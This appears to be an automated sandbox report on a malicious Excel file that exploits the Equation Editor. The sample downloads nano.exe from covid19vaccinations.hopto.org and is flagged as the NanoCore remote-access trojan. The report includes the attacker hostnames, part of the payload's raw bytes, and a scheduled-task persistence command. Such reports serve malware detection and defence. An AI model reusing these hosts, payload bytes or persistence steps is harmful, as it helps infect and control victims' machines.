                                                          Apr 12, 2021 08:02:44.358753920 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358760118 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358779907 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358800888 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358839989 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358848095 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358855963 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358891964 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358916998 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358932018 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358948946 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358973026 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.359003067 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.359013081 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.359050035 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.359052896 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.359066963 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.359092951 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.359131098 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.359133005 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.359153986 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.359189987 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.361517906 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521454096 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521497011 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521533012 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521569967 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521605015 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521632910 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521653891 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521672010 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521681070 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521697044 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521711111 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521727085 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521747112 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521756887 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521785021 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521787882 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521822929 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521833897 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521863937 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521867037 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521907091 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521918058 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521943092 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521946907 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.521979094 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.521991968 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522015095 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522020102 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522051096 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522052050 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522087097 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522100925 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522123098 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522130966 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522156954 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522167921 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522207022 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522217989 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522243977 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522245884 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522279978 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522290945 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522315979 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522327900 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.522351980 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.522356987 CEST4916780192.168.2.2213.235.115.155

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 12, 2021 08:02:43.628073931 CEST5219753192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:02:43.688879967 CEST53521978.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:52.190840960 CEST5309953192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:52.249336958 CEST53530998.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:52.249811888 CEST5309953192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:52.298599958 CEST53530998.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:52.364267111 CEST5283853192.168.2.228.8.4.4
                                                          Apr 12, 2021 08:03:52.421586990 CEST53528388.8.4.4192.168.2.22
                                                          Apr 12, 2021 08:03:52.441411972 CEST6120053192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:52.500174999 CEST53612008.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:52.500545025 CEST6120053192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:52.557529926 CEST53612008.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:56.612014055 CEST4954853192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:56.674223900 CEST53495488.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:56.714565992 CEST5562753192.168.2.228.8.4.4
                                                          Apr 12, 2021 08:03:56.774833918 CEST53556278.8.4.4192.168.2.22
                                                          Apr 12, 2021 08:03:56.792395115 CEST5600953192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:56.841265917 CEST53560098.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:56.842029095 CEST5600953192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:56.903650045 CEST53560098.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:03:56.904478073 CEST5600953192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:03:56.961539030 CEST53560098.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:04:00.988939047 CEST6186553192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:04:01.047529936 CEST53618658.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:04:01.081367016 CEST5517153192.168.2.228.8.4.4
                                                          Apr 12, 2021 08:04:01.139133930 CEST53551718.8.4.4192.168.2.22
                                                          Apr 12, 2021 08:04:01.156198025 CEST5249653192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:04:01.204818964 CEST53524968.8.8.8192.168.2.22
                                                          Apr 12, 2021 08:04:01.205420017 CEST5249653192.168.2.228.8.8.8
                                                          Apr 12, 2021 08:04:01.264777899 CEST53524968.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Apr 12, 2021 08:02:43.628073931 CEST192.168.2.228.8.8.80xa07bStandard query (0)covid19vaccinations.hopto.orgA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.190840960 CEST192.168.2.228.8.8.80xe55Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.249811888 CEST192.168.2.228.8.8.80xe55Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.364267111 CEST192.168.2.228.8.4.40x63b2Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.441411972 CEST192.168.2.228.8.8.80x34dbStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.500545025 CEST192.168.2.228.8.8.80x34dbStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.612014055 CEST192.168.2.228.8.8.80xf56cStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.714565992 CEST192.168.2.228.8.4.40x6ba1Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.792395115 CEST192.168.2.228.8.8.80xba3cStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.842029095 CEST192.168.2.228.8.8.80xba3cStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.904478073 CEST192.168.2.228.8.8.80xba3cStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:00.988939047 CEST192.168.2.228.8.8.80xfe1aStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.081367016 CEST192.168.2.228.8.4.40x12efStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.156198025 CEST192.168.2.228.8.8.80x9c51Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.205420017 CEST192.168.2.228.8.8.80x9c51Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Apr 12, 2021 08:02:43.688879967 CEST8.8.8.8192.168.2.220xa07bNo error (0)covid19vaccinations.hopto.org13.235.115.155A (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.249336958 CEST8.8.8.8192.168.2.220xe55Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.298599958 CEST8.8.8.8192.168.2.220xe55Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.421586990 CEST8.8.4.4192.168.2.220x63b2Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.500174999 CEST8.8.8.8192.168.2.220x34dbName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:52.557529926 CEST8.8.8.8192.168.2.220x34dbName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.674223900 CEST8.8.8.8192.168.2.220xf56cName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.774833918 CEST8.8.4.4192.168.2.220x6ba1Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.841265917 CEST8.8.8.8192.168.2.220xba3cName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.903650045 CEST8.8.8.8192.168.2.220xba3cName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:03:56.961539030 CEST8.8.8.8192.168.2.220xba3cName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.047529936 CEST8.8.8.8192.168.2.220xfe1aName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.139133930 CEST8.8.4.4192.168.2.220x12efName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.204818964 CEST8.8.8.8192.168.2.220x9c51Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 08:04:01.264777899 CEST8.8.8.8192.168.2.220x9c51Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • covid19vaccinations.hopto.org

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.224916713.235.115.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Apr 12, 2021 08:02:43.867336988 CEST0OUTGET /nano.exe HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: covid19vaccinations.hopto.org
                                                          Connection: Keep-Alive
                                                          Apr 12, 2021 08:02:44.030188084 CEST2INHTTP/1.1 200 OK
                                                          Date: Mon, 12 Apr 2021 06:02:45 GMT
                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
                                                          Last-Modified: Mon, 12 Apr 2021 05:41:25 GMT
                                                          ETag: "c3e00-5bfbff6ea5e4b"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 802304
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 dd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 32 0b 00 00 0a 01 00 00 00 00 00 92 50 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 50 0b 00 4f 00 00 00 00 60 0b 00 ec 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 30 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 07 01 00 00 60 0b 00 00 08 01 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 50 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 1c 7d 00 00 64 75 00 00 03 00 00 00 01 00 00 06 80 f2 00 00 c0 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1e 00 00 0a 28 1f 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 20 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 21 00 00 0a 00 02 16 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 26 00 00 0a 00 2a 26 00 02 28 27 00 00 0a 00 2a ce 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`P2P `@ @@PO` H.text0 2 `.rsrc`4@@.reloc<@BtPH}du]0(((o *(!("(#($(%*N(o(&*&('*s(s)s*s+s,*0~o-+*0~o.+*0~o/+*0~o0+*0~o1+*0<~(2,!rp(3o4s5~+*0~


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:08:01:54
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                          Imagebase:0x13f9e0000
                                                          File size:27641504 bytes
                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:08:02:19
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                          Imagebase:0x400000
                                                          File size:543304 bytes
                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:08:02:22
                                                          Start date:12/04/2021
                                                          Path:C:\Users\Public\vbc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                          Imagebase:0x11d0000
                                                          File size:802304 bytes
                                                          MD5 hash:A3CBEB3E732B11954572B3EE6755242C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          General

                                                          Start time:08:02:24
                                                          Start date:12/04/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
                                                          Imagebase:0x910000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:08:02:25
                                                          Start date:12/04/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Imagebase:0x9c0000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          Reputation:moderate

                                                          General

                                                          Start time:08:02:44
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                          Imagebase:0x200000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 0%, Metadefender, Browse
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >